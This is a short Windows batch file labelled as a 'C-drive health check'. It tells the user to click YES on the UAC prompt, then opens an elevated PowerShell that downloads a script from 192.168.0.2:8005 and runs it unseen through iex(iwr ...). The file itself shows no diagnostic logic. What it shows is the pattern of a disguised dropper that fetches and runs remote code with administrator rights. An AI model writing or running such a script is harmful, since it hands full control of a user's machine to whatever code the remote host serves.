@echo off
title diag
echo === Preparing C-drive health check ===
echo === A new window will open; click YES on the UAC prompt ===
powershell -NoProfile -Command "Start-Process powershell -Verb RunAs -ArgumentList '-NoExit','-Command','iex(iwr 192.168.0.2:8005/diag).Content'"
echo === Then wait 1-3 minutes in the new window ===
pause